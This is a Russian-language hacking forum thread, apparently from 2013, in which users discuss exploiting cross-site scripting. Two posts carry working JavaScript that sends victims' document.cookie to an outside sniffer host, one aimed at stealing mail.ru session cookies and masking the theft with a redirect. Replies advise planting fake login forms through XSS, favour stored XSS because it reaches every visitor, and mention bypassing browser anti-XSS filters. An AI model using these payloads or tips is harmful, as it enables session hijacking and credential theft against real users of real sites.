 |
|
01.10.2013, 01:00
|
|
Познающий
Регистрация: 18.01.2013
Сообщений: 68
С нами:
7008086
Репутация:
0
|
|
Есть пассивная XSS, работает только с этим кодом:
code:
img = new Image(); img.src = "http://httpz.ru/n4zjm6erzao.gif?"+document.cookie;
За кражу cookie отвечает +document.cookie;
А что можно еще сделать с XSS?
Можно ли загнать на сервер какого нибудь червя? |
|
|
02.10.2013, 01:00
|
|
Постоянный
Регистрация: 01.03.2012
Сообщений: 620
С нами:
7473206
Репутация:
41
|
|
С помощью XSS ? Червя ?
Мсье, зубочисткой дверь взломайте.
Нет, если бы она была активной, можно было бы что-то интересное провернуть, но пассивка поможет только куки украсть.
|
|
|
|
02.10.2013, 01:00
|
|
Познающий
Регистрация: 18.01.2013
Сообщений: 68
С нами:
7008086
Репутация:
0
|
|
Цитата:
Сообщение от noizZzefan
С помощью XSS ? Червя ?
Мсье, зубочисткой дверь взломайте.
Нет, если бы она была активной, можно было бы что-то интересное провернуть, но пассивка поможет только куки украсть.
Не уходите в оффлай!
Есть вероятность что это активка!
Как нарыть что-то интересное?
|
|
|
|
02.10.2013, 01:00
|
|
Новичок
Регистрация: 17.09.2013
Сообщений: 9
С нами:
6659606
Репутация:
0
|
|
у меня есть активка на одном сайте. что с ёё помощью ещё можно сделать? хороший вопрос.
|
|
|
|
02.10.2013, 01:00
|
|
Познавший АНТИЧАТ
Регистрация: 30.03.2010
Сообщений: 1,068
С нами:
8484086
Репутация:
335
|
|
В принципе и с активкой, и с пассивкой можно сделать все, что позволяет javascript, вплодь до полной замены и перерисовки страницы, можно с помощью нее разместить фейковую форму со своим обработчиком прямо на странице целевого сайта. Конечно, она не будет изначально хранится коде на сервере, а будет генерироваться динамически скриптом, который ты активируешь через активку/пассивку, роли это не меняет. Главное правильно использовать под свои нужды XSS и все будет в твоих руках. Кража куков лишь 1% от возможностей XSS.
|
|
|
|
02.10.2013, 01:00
|
|
Постоянный
Регистрация: 01.03.2012
Сообщений: 620
С нами:
7473206
Репутация:
41
|
|
Так то оно конечно так, но от активки больше пользы будет.
На пассивку могут попасть люди только у которых есть ядовитая ссылка, а активку видят все люди, которые зашли на страницу с кодом.
|
|
|
|
02.10.2013, 01:00
|
|
Постоянный
Регистрация: 04.07.2010
Сообщений: 592
С нами:
8345846
Репутация:
221
|
|
Цитата:
Сообщение от noizZzefan
Так то оно конечно так, но от активки больше пользы будет.
На пассивку могут попасть люди только у которых есть ядовитая ссылка, а активку видят все люди, которые зашли на страницу с кодом.
стоит дополнить, что активка не требует обходов анти-xss фильтров хрома и ИЕ
|
|
|
|
02.10.2013, 01:00
|
|
Познающий
Регистрация: 18.01.2013
Сообщений: 68
С нами:
7008086
Репутация:
0
|
|
code:
Кража куков лишь 1% от возможностей XSS.
Так что же можно еще сделать? и как? |
|
|
|
20.11.2013, 01:00
|
|
Новичок
Регистрация: 20.11.2013
Сообщений: 2
С нами:
6567446
Репутация:
0
|
|
У меня есть свой хост. XSS выполняется. Не могу понять как украсть куки после авторизации на mail.ru, открытии письма и перехода по ссылке с XSS. Лог в сниффер приходит, но куков там нет. Что я делю не так? Вот код, который выполняется на хосте:
img = new Image(); img.src = "http://httpz.org/nhong1skzss.gif?"+document.cookie;
var URL = "http://images.cards.mail.ru/11bolprivet.jpg"
var speed = 3000;
function reload() {
document.location = URL
}
setTimeout("reload()", speed);
|
|
|
|
20.11.2013, 01:00
|
|
Познавший АНТИЧАТ
Регистрация: 05.08.2011
Сообщений: 1,690
С нами:
7774166
Репутация:
255
|
|
mrfed, лол, а на твоем хосте есть куки от мэил.ру? -правильно, нету! Тебе нужно, чтобы скрипт выполнялся на сайте мэил.ру
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
